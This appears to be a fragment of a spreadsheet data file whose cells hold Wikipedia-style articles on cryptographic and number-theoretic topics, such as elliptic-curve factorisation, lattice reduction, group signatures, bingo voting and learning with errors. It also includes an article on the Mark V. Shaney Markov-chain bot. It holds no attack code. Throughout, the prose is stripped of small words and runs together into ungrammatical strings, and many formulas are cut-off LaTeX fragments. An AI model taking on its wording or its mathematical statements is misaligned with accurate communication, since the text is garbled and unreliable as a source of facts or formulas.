{\displaystyle x^{2}+y^{2}=1+dx^{2}y^{2}} point {\displaystyle (a,b)} {\displaystyle b\notin \{-2,-1/2,0,\pm 1\},a^{2}=-(b^{2}+2b)} {\displaystyle d=-(2b+1)/(a^{2}b^{2})} {\displaystyle x^{2}+y^{2}=1+dx^{2}y^{2}} point {\displaystyle (a,b)} {\displaystyle a={\frac {u^{2}-1}{u^{2}+1}},b=-{\frac {(u-1)^{2}}{u^{2}+1}}} {\displaystyle d={\frac {(u^{2}+1)^{3}(u^{2}-4u+1)}{(u-1)^{6}(u+1)^{2}}},u\notin \{0,\pm 1\}.} every edwards curve point order written ways shown above. curves torsion group isomorphic {\displaystyle \mathbb /2\mathbb \times \mathbb /8\mathbb {\displaystyle \mathbb /2\mathbb \times \mathbb /4\mathbb efficient finding primes. stage text first stage elliptic curve factorisation. there hopes find prime divisor {\displaystyle neutral element {\displaystyle e(\mathbb /p\mathbb second stage hopes found prime divisor {\displaystyle small prime order {\displaystyle e(\mathbb /q\mathbb hope order {\displaystyle b_{1}} {\displaystyle b_{2}} {\displaystyle b_{1}} determined stage {\displaystyle b_{2}} stage parameter. checking small order {\displaystyle done computing {\displaystyle (ls)p} modulo prime gmp-ecm eecm-mpfq twisted edwards elliptic curves, well techniques used bernstein provide optimized implementation ecm. drawback works smaller composite numbers general purpose implementation, gmp-ecm zimmerman. hyperelliptic-curve method (hecm) there recent developments using hyperelliptic curves factor integers. cosset shows article 2010) build hyperelliptic curve genus curve {\displaystyle y^{2}=f(x)} degree gives result using "normal" elliptic curves time. making kummer surface, calculation efficient. disadvantages hyperelliptic curve (versus elliptic curve) compensated alternative calculating. therefore, cosset roughly claims using hyperelliptic curves factorization worse using elliptic curves. quantum version (geecm) bernstein, heninger, lou, valenta suggest geecm, quantum version edwards curves. uses grover's algorithm roughly double length primes found compared standard eecm, assuming quantum computer sufficiently many qubits comparable speed classical computer running eecm. also ubasic practical program (ecmx). references bernstein, daniel birkner, peter; lange, tanja; peters, christiane (2013). "ecm using edwards curves". mathematics computation. (282): 1139–1179. doi:10.1090/s0025-5718-2012-02633-0. 3008853. bosma, hulst, (1990). primality proving cyclotomy. ph.d. thesis, universiteit amsterdam. oclc 256778332. brent, richard (1999). "factorization tenth fermat number". mathematics computation. (225): 429–451. bibcode:1999macom..68..429b. doi:10.1090/s0025-5718-99-00992-8. 1489968. cohen, henri (1993). course computational algebraic number theory. graduate texts mathematics. vol. 138. berlin: springer-verlag. doi:10.1007/978-3-662-02945-9. isbn 978-0-387-55640-6. 1228206. cosset, (2010). "factorization genus curves". mathematics computation. (270): 1191–1208. arxiv:0905.2325. bibcode:2010macom..79.1191c. doi:10.1090/s0025-5718-09-02295-9. 2600562. s2cid 914296. lenstra, lenstra jr., eds. (1993). development number field sieve. lecture notes mathematics. vol. 1554. berlin: springer-verlag. doi:10.1007/bfb0091534. isbn 978-3-540-57013-4. 1321216. lenstra jr., (1987). "factoring integers elliptic curves" (pdf). annals mathematics. (3): 649–673. doi:10.2307/1971363. hdl:1887/2140. jstor 1971363. 0916721. pomerance, carl; crandall, richard (2005). prime numbers: computational perspective (second ed.). york: springer. isbn 978-0-387-25282-7. 2156291. pomerance, carl (1985). "the quadratic sieve factoring algorithm". advances cryptology, proc. eurocrypt '84. lecture notes computer science. vol. 209. berlin: springer-verlag. 169–182. doi:10.1007/3-540-39757-4_17. isbn 978-3-540-16076-2. 0825590. pomerance, carl (1996). tale sieves" (pdf). notices american mathematical society. (12): 1473–1485. 1416721. silverman, robert (1987). "the multiple polynomial quadratic sieve". mathematics computation. (177): 329–339. doi:10.1090/s0025-5718-1987-0866119-8. 0866119. trappe, washington, (2006). introduction cryptography coding theory (second ed.). saddle river, pearson prentice hall. isbn 978-0-13-186239-5. 2372272. samuel wagstaff, (2013). factoring. providence, american mathematical society. 173–190. isbn 978-1-4704-1048-3. watras, marcin (2008). cryptography, number analysis, very large numbers. bydgoszcz: wojciechowski-steinhagen. pl:5324564. external links factorization using elliptic curve method, java applet uses switches self-initializing quadratic sieve faster. gmp-ecm, efficient implementation ecm. ecmnet, easy client-server implementation works several factorization projects. pyecm, python implementation ecm. much faster psyco and/or gmpy. distributed computing project yoyo@home subproject program elliptic curve factorization used couple projects find factors different kind numbers. lenstra elliptic curve factorization algorithm source code simple elliptic curve factorization algorithm source code. eecm-mpfq implementation using edwards curves written mpfq finite field library.</t>
  </si>
  <si>
    <t>Lattice reduction</t>
  </si>
  <si>
    <t>mathematics, goal lattice basis reduction find basis short, nearly orthogonal vectors given integer lattice basis input. this realized using different algorithms, whose running time usually least exponential dimension lattice. nearly orthogonal measure nearly orthogonal orthogonality defect. this compares product lengths basis vectors volume parallelepiped define. perfectly orthogonal basis vectors, quantities would same. particular basis {\displaystyle vectors represented matrix {\displaystyle whose columns basis vectors {\displaystyle b_{i},i=1,\ldots fully dimensional case number basis vectors equal dimension space occupy, matrix square, volume fundamental parallelepiped simply absolute value determinant matrix {\displaystyle \det(b)} number vectors less dimension underlying space, volume {\displaystyle {\sqrt {\det(b^{t}b)}}} given lattice {\displaystyle \lambda volume sign) basis, hence referred determinant lattice {\displaystyle \det(\lambda lattice constant {\displaystyle d(\lambda orthogonality defect product basis vector lengths divided parallelepiped volume; {\displaystyle \delta (b)={\frac {\pi _{i=1}^{n}\|b_{i}\|}{\sqrt {\det(b^{t}b)}}}={\frac {\pi _{i=1}^{n}\|b_{i}\|}{d(\lambda )}}} from geometric definition appreciated {\displaystyle \delta (b)\geq equality basis orthogonal. lattice reduction problem defined finding basis smallest possible defect, problem np-hard. however, exist polynomial time algorithms find basis defect {\displaystyle \delta (b)\leq constant depending number basis vectors dimension underlying space different). this good enough solution many practical applications. dimensions basis consisting vectors, simple efficient method reduction closely analogous euclidean algorithm greatest common divisor integers. euclidean algorithm, method iterative; step larger vectors reduced adding subtracting integer multiple smaller vector. pseudocode algorithm, often known lagrange's algorithm lagrange-gauss algorithm, follows: input: {\textstyle (u,v)} basis lattice {\textstyle assume {\textstyle ||v||\leq ||u||} otherwise swap them. output: basis {\textstyle (u,v)} {\textstyle ||u||=\lambda _{1}(l),||v||=\lambda _{2}(l)} while {\textstyle ||v||\leq ||u||} {\textstyle q:=\lfloor {\langle u,{\frac {v}{||v||^{2}}}\rangle }\rceil {\textstyle r:=u-qv} {\textstyle u:=v} {\textstyle v:=r} section lagrange's algorithm details. applications lattice reduction algorithms used number modern number theoretical applications, including discovery spigot algorithm {\displaystyle although determining shortest basis possibly np-complete problem, algorithms algorithm find short (not necessarily shortest) basis polynomial time guaranteed worst-case performance. widely used cryptanalysis public cryptosystems. when used find integer relations, typical input algorithm consists augmented {\displaystyle n\times identity matrix entries last column consisting {\displaystyle elements (multiplied large positive constant {\displaystyle penalize vectors zero) relation sought. algorithm computing nearly-orthogonal basis used show integer programming fixed dimension done polynomial time. algorithms following algorithms reduce lattice bases; several public implementations algorithms also listed. references</t>
  </si>
  <si>
    <t>Markovian discrimination</t>
  </si>
  <si>
    <t>within probability theory markov model, markovian discrimination spam filtering method used crm114 spam filters model statistical behaviors spam nonspam accurately simple bayesian methods. simple bayesian model written text contains dictionary legal words relative probabilities. markovian model adds relative transition probabilities given word, predict next word based theory markov chains andrey markov, hence name. essence, bayesian filter works single words alone, markovian filter works phrases entire sentences. there types markov models; visible markov model, hidden markov model hmm. difference visible markov model, current word considered contain entire state language model, hidden markov model hides state presumes current word probabilistically related actual internal state language. example, visible markov model word "the" predict accuracy following word, hidden markov model, entire prior text implies actual state predicts following words, actually guarantee state prediction. since latter case what's encountered spam filtering, hidden markov models almost always used. particular, storage limitations, specific type hidden markov model called markov random field particularly applicable, usually clique size four tokens. also maximum-entropy markov model references chhabra, yerazunis, siefkes, 2004. spam filtering using markov random field model variable weighting schemas. proceedings fourth ieee international conference data mining (november 1–04, 2004). icdm. ieee computer society, washington, mazharul</t>
  </si>
  <si>
    <t>Encyclopedia of Cryptography and Security</t>
  </si>
  <si>
    <t>encyclopedia cryptography security comprehensive work cryptography information security professionals experts fields computer science, applied mathematics, engineering, information theory, data encryption, etc. consists articles alphabetical order available electronically print. encyclopedia representative advisory board consisting leading international specialists. topics include limited authentication identification, copy protection, cryptoanalysis security, factorization algorithms primality tests, cryptographic protocols, management, electronic payments digital certificates, hash functions macs, elliptic curve cryptography, quantum cryptography security. style articles explanatory character used undergraduate graduate courses. advisory board members carlisle adams, entrust, inc. friedrich bauer, technische universität münchen gerrit bleumer, francotyp-postalia boneh, stanford university pascale charpin, inria-rocquencourt claude crepeau, mcgill university desmedt, university college london (university london) grigory kabatiansky, institute information transmission problems burt kaliski, security peter landrock, university aarhus patrick drew mcdaniel, penn state university alfred menezes, university waterloo david naccache, gemplus christof paar, ruhr-universität bochum bart preneel, katholieke universiteit leuven jean-jacques quisquater, université catholique louvain kazue sako, corporation berry schoenmakers, technische universiteit eindhoven references</t>
  </si>
  <si>
    <t>Group signature</t>
  </si>
  <si>
    <t>group signature scheme method allowing member group anonymously sign message behalf group. concept first introduced david chaum eugene heyst 1991. example, group signature scheme could used employee large company sufficient verifier know message signed employee, particular employee signed another application keycard access restricted areas inappropriate track individual employee's movements, necessary secure areas employees group. essential group signature scheme group manager, charge adding group members ability reveal original signer event disputes. systems responsibilities adding members revoking signature anonymity separated given membership manager revocation manager respectively. many schemes proposed, however follow basic requirements: soundness completeness valid signatures group members always verify correctly, invalid signatures always fail verification. unforgeable only members group create valid group signatures. anonymity given message signature, identity individual signer cannot determined without group manager's secret key. traceability given valid signature, group manager able trace user issued signature. (this previous requirement imply group manager break users' anonymity.) unlinkability given messages signatures, cannot tell signatures signer not. framing even group members (and managers) collude, cannot forge signature non-participating group member. unforgeable tracing verification revocation manager cannot falsely accuse signer creating signature create. coalition resistance colluding subset group members cannot generate valid signature group manager cannot link colluding group members.the acjt 2000, bbs04, bs04 ccs) group signature schemes state art. (note: might incomplete list.) boneh, boyen shacham published 2004 (bbs04, crypto04) novel group signature scheme based bilinear maps. signatures scheme approximately size standard signature (around bytes). security scheme proven random oracle model relies strong diffie hellman assumption (sdh) assumption bilinear groups called decision linear assumption (dlin). formal definition geared towards provable security given bellare, micciancio warinschi. also ring signature: similar system excludes requirement group manager provides true anonymity signers (several algorithms nevertheless maintain "restricting" properties, like traceability linkability) threshold signature: threshold signature involves fixed-size quorum (threshold) signers. each signer must genuine group member share group secret signing key. (t,n) threshold signature scheme supports potential signers, behalf group. threshold signatures reveal nothing signers; trace identity signers (not even trusted center system). multisignature: multisignature represents certain number signers signing given message. number signers fixed signers identities evident given multi-signature. multisignature much shorter (sometimes constant) simple collection individual signatures. proxy signature: proxy signature allows delegator give partial signing rights parties called proxy signers. proxy signatures offer anonymity identity escrow schemes: interactive dual group signatures. instead off-line generation, signature directly generated signer based challenge provided verifier. references external links chaum, david; heyst, eugene (1991). "group signatures" (pdf). advances cryptology eurocrypt '91. lecture notes computer science. 547: 257–265. doi:10.1007/3-540-46416-6_22. isbn 978-3-540-54620-7. camenisch, jan; michels, markus (1998). group signature scheme based rsa-variant" (pdf). basic research computer science. (27). doi:10.7146/brics.v5i27.19433. issn 0909-0878. bellare; shi; zhang (2005). menezes (ed.). "foundations group signatures: case dynamic groups". topics cryptology ct-rsa 2005 proceedings. lecture notes computer science. springer-verlag. 3376: 136–153. doi:10.1007/978-3-540-30574-3_11. isbn 978-3-540-24399-1. bellare, mihir; micciancio, daniele; warinschi, bogdan (may 2003). "foundations group signatures: formal definition, simplified requirements construction based general assumptions". advances cryptology eurocrypt 2003. lecture notes computer science. warsaw, poland: springer. 2656: 614–629. doi:10.1007/3-540-39200-9_38. isbn 978-3-540-14039-9. kilian, joe; petrank, erez (1998). "identity escrow". advances cryptology eurocrypt '98. lecture notes computer science. 1462: 169–185. citeseerx 10.1.1.21.6420. doi:10.1007/bfb0055727. isbn 978-3-540-64892-5.</t>
  </si>
  <si>
    <t>Bingo voting</t>
  </si>
  <si>
    <t>bingo voting electronic voting scheme transparent, secure, end-to-end auditable elections. introduced 2007 jens-matthias bohli, jörn müller-quade, stefan röhrich institute cryptography security (iks) karlsruhe institute technology (kit).random numbers used record votes. central scheme trusted random number generating devices voting booths alongside electronic voting machines. also crucial paper receipts which, revealing vote cast, inhibiting vote buying intimidation, still allow voters check vote correctly counted.the scheme allows correctness election result verifiably proved relying integrity in-booth random number generators (hence "trusted"); proof correctness rely still less need prove, integrity electronic voting machines themselves.no particular demands placed voters, ballot papers used. special requirement, however, prevent fraudulent challenges election result, unforgeable paper receipts. before poll before election, pool "dummy votes", random numbers, generated. many numbers generated candidate voters. each dummy vote encrypted using cryptographic commitment scheme—akin placing dummy votes "sealed envelopes." list commitments (encrypted dummy votes) published along proof dummy votes equally distributed candidates. additional "candidates" defined support protest votes, "none above" votes, etc. during poll voting booth voter chooses preferred candidate pressing corresponding voting machine button. random number generating device booth generates fresh random number, displays passes voting machine, allocates selected candidate. candidates voting machine randomly selects candidate's dummy votes dummy vote pool. dummy vote used once. ballot, then, consists random number candidate. voting machine issues voter printed receipt listing candidates assigned random numbers. leaving booth, voter check vote correctly recorded comparing chosen candidate's number receipt number displayed random number generator. receipt show voter voted non-dummy random number issued voting booth indistinguishable dummy votes drawn pool. dummy votes pool remain hidden "unopened" commitments). after poll after polls close ballots published sorted list (they could published vote, real-time). also, unused dummy votes revealed (the commitments "opened") published. result election derived numbers unused dummy votes: since vote candidate results unused dummy vote, candidate's tally must equal number unused dummy votes less number non-voters. number non-voters difference number dummy votes originally generated candidate number published ballots. finally, correctness election—the fact cast ballot contains exactly non-dummy vote every unrevealed dummy vote used ballot—is proven zero knowledge proofs still reveal vote cast for. proofs published. voters assure vote counted finding receipt published list ballots. anyone view published lists proofs verify result. trusted random number generator secrecy vote, fact printed receipt reveal vote cast, depends numbers generated voting booth sufficiently random cannot identified. ensure voters confidence randomness numbers generated booth, authors bingo voting method suggest simple, transparent random number generator used, mechanical "bingo" number generator, kind numbered balls inside spinning cage (hence method's name). sensors could used read generated number pass voting machine. such solution would high voter trust might impractical. real-life test, student parliament election, authors used modified smart card readers random number generators.that generated numbers predictable election authority pre-condition proof correctness elections: only in-booth random number generators trusted proof correctness valid. authors makes point separate random number generator effectively protected manipulation voting machine.note randomness random numbers investigated election published: pre-generated dummy votes either used, appear ballots, unused published poll. numbers generated booths poll ballots. improvements 2012 thesis christian henrich karlsruhe institute technology, supervised original authors, jörn müller-quade, proposes number changes enhancements bingo voting: make feasible largest elections (for example, general election india) optimising proofs constraining length random numbers order reduce vast amount data published, support elections allowing multiple votes ranked voting (the single transferable vote, example), dispute resolution, counter possible fraud election authority using discarded receipts,and offers analysis improved method's security usability. another 2012 paper, carmen kempka, also researcher kit, proposes extension bingo voting support write-in candidates without impairing verification correctness coercion resistance, although relies trusted authority. also end-to-end auditable voting systems electronic voting punchscan scantegrity threeballot farnel notes references bohli, jens-matthias; müller-quade, jörn; röhrich, stefan (2006). bingo voting: secure coercion-free voting using trusted random number generator, international association cryptologic research, cryptology eprint archive. bohli, jens-matthias; müller-quade, jörn; röhrich, stefan (2007). alkassar, ammar; volkamer, melanie. "bingo voting: secure coercion-free voting using trusted random number generator". e-voting identity, first international conference, vote-id 2007, bochum, germany, october 4–5, 2007, revised selected papers. lecture notes computer science (springer berlin heidelberg) 4896:111-124.</t>
  </si>
  <si>
    <t>Mark V. Shaney</t>
  </si>
  <si>
    <t>mark shaney synthetic usenet user whose postings net.singles newsgroups generated markov chain techniques, based text postings. username play words "markov chain". many readers fooled thinking quirky, sometimes uncannily topical posts written real person. system designed pike coding bruce ellis. mitchell wrote markov chain code, initially demonstrating pike ellis using ching basis. they chose apply net.singles netnews group. examples classic example, 1984, originally sent mail message, later posted net.singles reproduced here: &gt;from 17:11 1984 remote alice looks like reagan going say? ummm... yes, looking for. glad remembered yeah, wondered committed crime. don't assessment reagon mondale. nose firm specifically researches teen-age market. friend mine would say, really matter"... looks like reagan holding back arms american eating public changed dramatically, pretty boring games. people, much larger number varieties, different find chinatowns across country (things like pork buns, steamed dumplings, etc.) they cheap, sold around cents apiece (depending size), generally greasy, adequately explained stupidity. singles felt insecure since came conservative world large. chuqui happened prices very reasonable. anyone think third sex. yes, expected have. people often used knowing things cover placed them. along side spent least girls. can't settle issue. seems i've forgotten don't. know violence women, really doubt ever join together large number jokes. showed adam, created. modem autodial routine. calls number 1440 times day. conclude saying well understand might soon time, makes sense, again, gist argument, (though republican administration). _-_-_-_-mark other quotations mark's usenet posts are: spent interesting evening recently grain salt." (alternatively reported "while conference weeks back, spent interesting evening grain salt.") hope sour apples every bushel." history usenet handbook mark harrison writes september 1981, students joined usenet masse, "creating usenet know today: endless dumb questions, endless idiots posing savants, course) endless victims practical jokes." december, pike created netnews group net.suicide prank, forum jokes". some users thought legitimate forum, discussed "riding motorcycles without helmets". first, posters "real people", soon "characters" began posting. pike created "vicious" character named bimmler. peak, net.suicide frequent posters; nine "known characters." ultimately, pike deleted newsgroup much work maintain; bimmler messages created hand". "obvious alternative" software, running bell labs computer created bruce ellis, based markov code mitchell, became online character mark shaney.kernighan pike listed mark shaney acknowledgements practice programming, noting roots mitchell's markov, which, adapted shaney, used "humorous deconstructionist activities" 1980s.dewdney pointed "perhaps mark shaney's magnum opus: 20-page commentary deconstructionist philosophy jean baudrillard" directed pike, assistance henry baird catherine richards, distributed email. piece based jean baudrillard's "the precession simulacra", published simulacra simulation (1981). reception program discussed dewdney scientific american "computer recreations" column 1989, penn jillette computing column 1991, several books, including usenet handbook, bots: origin species, hippo eats dwarf: field guide hoaxes other b.s., non-computer-related journals texas studies literature language.dewdney wrote program's output, "the overall impression unlike remains brain inattentive student late-night study session. indeed, reading output mark shaney, find ordinary writing almost equally strange incomprehensible!" noted reactions newsgroup users, "shuddered mark shaney's reflections, rage others laughter:" opinions net.singles correspondent drew mixed reviews. serious users bulletin board's services sensed satire. outraged, urged someone "pull plug" mark shaney's monstrous rantings. others inquired almost admiringly whether program secret artificial intelligence project tested human conversational environment. even thought mark shaney real person, tortured schizophrenic desperately seeking like-minded companion.concluding, dewdney wrote, purpose computer prose fool people thinking written sane person, mark shaney probably falls short." also turing test dissociated press internet, nobody knows parody generator references external links plan operating system mark shaney unofficial biography "mark shaney your service" online version yisong yue. "mark shaney common lisp" racine systems. every mark shaney post google groups usenet archive. "sable debutante's journal", mark shaney clone livejournal markovtxt.c, markov.c source code bell labs</t>
  </si>
  <si>
    <t>Learning with errors</t>
  </si>
  <si>
    <t>learning errors (lwe) computational problem inferring linear {\displaystyle -ary function {\displaystyle finite ring given samples {\displaystyle y_{i}=f(\mathbf _{i})} erroneous. problem conjectured hard solve, thus useful cryptography. more precisely, problem defined follows. {\displaystyle \mathbb _{q}} denote ring integers modulo {\displaystyle {\displaystyle \mathbb _{q}^{n}} denote {\displaystyle -vectors {\displaystyle \mathbb _{q}} there exists certain unknown linear function {\displaystyle f:\mathbb _{q}^{n}\rightarrow \mathbb _{q}} input problem sample pairs {\displaystyle (\mathbf ,y)} {\displaystyle \mathbf \mathbb _{q}^{n}} {\displaystyle y\in \mathbb _{q}} high probability {\displaystyle y=f(\mathbf furthermore, deviation equality according known noise model. problem calls finding function {\displaystyle close approximation thereof, high probability. problem introduced oded regev 2005 (who 2018 gödel prize work), generalization parity learning problem. regev showed problem hard solve several worst-case lattice problems. subsequently, problem used hardness assumption create public-key cryptosystems, ring learning errors exchange peikert. definition denote {\displaystyle \mathbb =\mathbb /\mathbb additive group reals modulo one. {\displaystyle \mathbf \mathbb _{q}^{n}} fixed vector. {\displaystyle \phi fixed probability distribution {\displaystyle \mathbb denote {\displaystyle a_{\mathbf ,\phi distribution {\displaystyle \mathbb _{q}^{n}\times \mathbb obtained follows. pick vector {\displaystyle \mathbf \mathbb _{q}^{n}} uniform distribution {\displaystyle \mathbb _{q}^{n}} pick number {\displaystyle e\in \mathbb distribution {\displaystyle \phi evaluate {\displaystyle t=\langle \mathbf ,\mathbf \rangle /q+e} {\displaystyle \textstyle \langle \mathbf ,\mathbf \rangle =\sum _{i=1}^{n}a_{i}s_{i}} standard inner product {\displaystyle \mathbb _{q}^{n}} division done field reals formally, "division {\displaystyle notation group homomorphism {\displaystyle \mathbb _{q}\longrightarrow \mathbb mapping {\displaystyle 1\in \mathbb _{q}} {\displaystyle 1/q+\mathbb \mathbb final addition {\displaystyle \mathbb output pair {\displaystyle (\mathbf ,t)} .the learning errors problem {\displaystyle \mathrm {lwe} _{q,\phi find {\displaystyle \mathbf \mathbb _{q}^{n}} given access polynomially many samples choice {\displaystyle a_{\mathbf ,\phi every {\displaystyle \alpha denote {\displaystyle d_{\alpha one-dimensional gaussian zero mean variance {\displaystyle \alpha ^{2}/(2\pi density function {\displaystyle d_{\alpha }(x)=\rho _{\alpha }(x)/\alpha {\displaystyle \rho _{\alpha }(x)=e^{-\pi (|x|/\alpha )^{2}}} {\displaystyle \psi _{\alpha distribution {\displaystyle \mathbb obtained considering {\displaystyle d_{\alpha modulo one. version considered results would {\displaystyle \mathrm {lwe} _{q,\psi _{\alpha decision version problem described search version problem. decision version (dlwe), goal distinguish noisy inner products uniformly random samples {\displaystyle \mathbb _{q}^{n}\times \mathbb (practically, discretized version it). regev showed decision search versions equivalent {\displaystyle prime bounded polynomial {\displaystyle solving decision assuming search intuitively, procedure search problem, decision version solved easily: feed input samples decision problem solver search problem. denote given samples {\displaystyle \{(\mathbf _{i},\mathbf _{i})\}\subset \mathbb _{q}^{n}\times \mathbb solver returns candidate {\displaystyle \mathbf {\displaystyle calculate {\displaystyle \{\langle \mathbf _{i},\mathbf \rangle -\mathbf _{i}\}} samples distribution, results calculation distributed according {\displaystyle \chi samples uniformly random, quantities distributed uniformly well. solving search assuming decision direction, given solver decision problem, search version solved follows: recover {\displaystyle \mathbf coordinate time. obtain first coordinate, {\displaystyle \mathbf _{1}} make guess {\displaystyle k\in z_{q}} following. choose number {\displaystyle r\in \mathbb _{q}} uniformly random. transform given samples {\displaystyle \{(\mathbf _{i},\mathbf _{i})\}\subset \mathbb _{q}^{n}\times \mathbb follows. calculate {\displaystyle \{(\mathbf _{i}+(r,0,\ldots ,0),\mathbf _{i}+(rk)/q)\}} send transformed samples decision solver. guess {\displaystyle correct, transformation takes distribution {\displaystyle a_{\mathbf ,\chi itself, otherwise, since {\displaystyle prime, takes uniform distribution. given polynomial-time solver decision problem errs small probability, since {\displaystyle bounded polynomial {\displaystyle takes polynomial time guess every possible value {\displaystyle solver correct. after obtaining {\displaystyle \mathbf _{1}} follow analogous procedure coordinate {\displaystyle \mathbf _{j}} namely, transform {\displaystyle \mathbf _{i}} samples way, transform {\displaystyle \mathbf _{i}} samples calculating {\displaystyle \mathbf _{i}+(0,\ldots ,r,\ldots ,0)} {\displaystyle {\displaystyle j^{\text{th}}} coordinate.peikert showed reduction, small modification, works {\displaystyle product distinct, small (polynomial {\displaystyle primes. main idea {\displaystyle q=q_{1}q_{2}\cdots q_{t}} {\displaystyle q_{\ell guess check {\displaystyle \mathbf _{j}} congruent {\displaystyle 0\mod q_{\ell chinese remainder theorem recover {\displaystyle \mathbf _{j}} average case hardness regev showed random self-reducibility dlwe problems arbitrary {\displaystyle {\displaystyle \chi given samples {\displaystyle \{(\mathbf _{i},\mathbf _{i})\}} {\displaystyle a_{\mathbf ,\chi easy {\displaystyle \{(\mathbf _{i},\mathbf _{i}+\langle \mathbf _{i},\mathbf \rangle )/q\}} samples {\displaystyle a_{\mathbf +\mathbf ,\chi suppose {\displaystyle {\mathcal {s}}\subset \mathbb _{q}^{n}} poly {\displaystyle |{\mathcal {s}}|/|\mathbb _{q}^{n}|=1/\operatorname {poly} (n)} distributions {\displaystyle a_{\mathbf ',\chi {\displaystyle \mathbf '\leftarrow {\mathcal {s}}} dlwe easy. then would distinguisher {\displaystyle {\mathcal {a}}} who, given samples {\displaystyle \{(\mathbf _{i},\mathbf _{i})\}} could tell whether uniformly random {\displaystyle a_{\mathbf ',\chi need distinguish uniformly random samples {\displaystyle a_{\mathbf ,\chi {\displaystyle \mathbf chosen uniformly random {\displaystyle \mathbb _{q}^{n}} could simply different values {\displaystyle \mathbf sampled uniformly random {\displaystyle \mathbb _{q}^{n}} calculate {\displaystyle \{(\mathbf _{i},\mathbf _{i}+\langle \mathbf _{i},\mathbf \rangle )/q\}} feed samples {\displaystyle {\mathcal {a}}} since {\displaystyle {\mathcal {s}}} comprises large fraction {\displaystyle \mathbb _{q}^{n}} high probability, choose polynomial number values {\displaystyle \mathbf find {\displaystyle \mathbf +\mathbf {\mathcal {s}}} {\displaystyle {\mathcal {a}}} successfully distinguish samples. thus, {\displaystyle {\mathcal {s}}} exist, meaning dlwe polynomial factor) hard average case worst case. hardness results regev's result n-dimensional lattice {\displaystyle smoothing parameter {\displaystyle \eta _{\varepsilon }(l)} denote smallest {\displaystyle {\displaystyle \rho _{1/s}(l^{*}\setminus \{\mathbf \})\leq \varepsilon {\displaystyle l^{*}} dual {\displaystyle {\displaystyle \rho _{\alpha }(x)=e^{-\pi (|x|/\alpha )^{2}}} extended sets summing function values element set. {\displaystyle d_{l,r}} denote discrete gaussian distribution {\displaystyle width {\displaystyle lattice {\displaystyle real {\displaystyle r&gt;0} probability {\displaystyle x\in proportional {\displaystyle \rho _{r}(x)} discrete gaussian sampling problem(dgs) defined follows: instance {\displaystyle dgs_{\phi given {\displaystyle -dimensional lattice {\displaystyle number {\displaystyle r\geq \phi (l)} goal output sample {\displaystyle d_{l,r}} regev shows reduction gapsvp {\displaystyle \operatorname {gapsvp} _{100{\sqrt {n}}\gamma (n)}} {\displaystyle dgs_{{\sqrt {n}}\gamma (n)/\lambda (l^{*})}} function {\displaystyle \gamma (n)\geq regev shows exists efficient quantum algorithm {\displaystyle dgs_{{\sqrt {2n}}\eta _{\varepsilon }(l)/\alpha given access oracle {\displaystyle \mathrm {lwe} _{q,\psi _{\alpha integer {\displaystyle {\displaystyle \alpha (0,1)} {\displaystyle \alpha q&gt;2{\sqrt {n}}} this implies hardness lwe. although proof assertion works {\displaystyle creating cryptosystem, modulus {\displaystyle polynomial {\displaystyle peikert's result peikert proves probabilistic polynomial time reduction gapsvp {\displaystyle \operatorname {gapsvp} _{\zeta ,\gamma problem worst case solving {\displaystyle \mathrm {lwe} _{q,\psi _{\alpha using poly {\displaystyle \operatorname {poly} (n)} samples parameters {\displaystyle \alpha (0,1)} {\displaystyle \gamma (n)\geq n/(\alpha {\sqrt {\log n}})} {\displaystyle \zeta (n)\geq \gamma (n)} {\displaystyle q\geq (\zeta /{\sqrt {n}})\omega {\sqrt {\log n}})} cryptography problem serves versatile problem used construction several cryptosystems. 2005, regev showed decision version hard assuming quantum hardness lattice problems {\displaystyle \mathrm {gapsvp} _{\gamma (for {\displaystyle \gamma above) {\displaystyle \mathrm {sivp} _{t}} {\displaystyle t=o(n/\alpha 2009, peikert proved similar result assuming classical hardness related problem {\displaystyle \mathrm {gapsvp} _{\zeta ,\gamma disadvantage peikert's result bases non-standard version easier (when compared sivp) problem gapsvp. public-key cryptosystem regev proposed public-key cryptosystem based hardness problem. cryptosystem well proof security correctness completely classical. system characterized {\displaystyle m,q} probability distribution {\displaystyle \chi {\displaystyle \mathbb setting parameters used proofs correctness security {\displaystyle q\geq usually prime number {\displaystyle n^{2}} {\displaystyle 2n^{2}} {\displaystyle m=(1+\varepsilon )(n+1)\log arbitrary constant {\displaystyle \varepsilon {\displaystyle \chi =\psi _{\alpha (n)}} {\displaystyle \alpha (n)\in o(1/{\sqrt {n}}\log {\displaystyle \psi _{\beta probability distribution obtained sampling normal variable mean {\displaystyle standard variation {\displaystyle {\frac {\beta }{\sqrt {2\pi }}}} reducing result modulo {\displaystyle .the cryptosystem defined private key: private {\displaystyle \mathbf \mathbb _{q}^{n}} chosen uniformly random. public key: choose {\displaystyle vectors {\displaystyle \mathbf _{1},\ldots ,\mathbf _{m}\in \mathbb _{q}^{n}} uniformly independently. choose error offsets {\displaystyle e_{1},\ldots ,e_{m}\in \mathbb independently according {\displaystyle \chi public consists {\displaystyle (\mathbf _{i},b_{i}=\langle \mathbf _{i},\mathbf \rangle /q+e_{i})_{i=1}^{m}} encryption: encryption {\displaystyle x\in \{0,1\}} done choosing random subset {\displaystyle {\displaystyle [m]} defining {\displaystyle \operatorname {enc} (x)} {\displaystyle \left(\sum _{i\in s}\mathbf _{i},{\frac {x}{2}}+\sum _{i\in s}b_{i}\right)} decryption: decryption {\displaystyle (\mathbf ,b)} {\displaystyle {\displaystyle b-\langle \mathbf ,\mathbf \rangle closer {\displaystyle {\displaystyle {\frac {1}{2}}} {\displaystyle otherwise.the proof correctness follows choice parameters probability analysis. proof security reduction decision version lwe: algorithm distinguishing encryptions (with parameters) {\displaystyle {\displaystyle used distinguish {\displaystyle a_{s,\chi uniform distribution {\displaystyle \mathbb _{q}^{n}\times \mathbb cca-secure cryptosystem peikert proposed system secure even chosen-ciphertext attack. exchange idea using ring exchange proposed filed university cincinnati 2011 jintai ding. idea comes associativity matrix multiplications, errors used provide security. paper appeared 2012 provisional patent application filed 2012. security protocol proven based hardness solving problem. 2014, peikert presented key-transport scheme following basic idea ding's, idea sending additional 1-bit signal rounding ding's construction also used. "new hope" implementation selected google's post-quantum experiment, uses peikert's scheme variation error distribution. also post-quantum cryptography lattice-based cryptography ring learning errors exchange short integer solution (sis) problem references</t>
  </si>
  <si>
    <t>Mark Ludwig</t>
  </si>
  <si>
